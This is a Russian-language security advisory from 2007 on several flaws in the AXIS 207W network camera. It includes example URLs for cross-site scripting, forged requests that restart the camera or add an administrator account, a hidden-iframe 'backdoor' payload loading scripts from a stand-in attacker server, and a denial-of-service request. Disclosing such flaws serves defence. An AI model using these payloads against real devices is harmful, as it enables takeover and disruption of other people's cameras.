Security Lab

Множественные уязвимости в AXIS 207W Network Camera

Дата публикации:18.09.2007
Всего просмотров:2681
Опасность:
Низкая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: CVE-2007-4927
CVE-2007-4926
CVE-2007-4928
CVE-2007-4929
CVE-2007-4930
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Отказ в обслуживании
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Axis Network Camera
Уязвимые версии: AXIS 207W Network Camera

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и вызвать отказ в обслуживании.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "camNo" в сценарии incl/image_incl.shtml. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://[host]/incl/image_incl.shtml?camNo=</script><script>alert(String.fromCharCode(88,83,83))</script>

2. Web интерфейс приложение позволяет пользователю произвести некоторые действия посредством HTTP запроса без проверки подлинности запроса. Злоумышленник может заманить авторизованного администратора на специально сформированный сайт и перегрузить камеру, добавить нового администратора или установить бекдор. Пример:

1. Перезагрузка камеры- http://www.example.com/axis-cgi/admin/restart.cgi
2. Добавление нового администратора-
http://[host]/axis-cgi/admin/pwdgrp.cgi?action=add&user=owner1&grp=axuser&sgrp=axview:axoper:axadmin&pwd=owner1&comment=WebUser&return_page=/admin/users_set.sh +tml%3Fpageclose%3D1
3. Установка бекдора -
http://[host]/admin/restartMessage.shtml?server=<iframe%20style=visibility:hidden%20src=http://www.evilserver.com/wifi/axisbd.php><iframe
src=http://www.evilserver.com/wifi/axisrb.htm><!â??

3. Уязвимость существует из-за ошибки в сценарии axis-cgi/buffer/command.cgi. Удаленный пользователь может послать большое количество HTTP запросов (более 129) уязвимому сценарию с параметром "do" равным "start" и произвольным значением параметра "buffername" и вызвать перезагрузку устройства. Для успешной эксплуатации уязвимости злоумышленнику требуется валидная учетная запись. Пример:

http://[host]/axis-cgi/buffer/command.cgi?do=start&buffername=<unique buffer name>

URL производителя: www.axis.com/products/video/camera/index.htm

Решение: Способов устранения уязвимости не существует в настоящее время.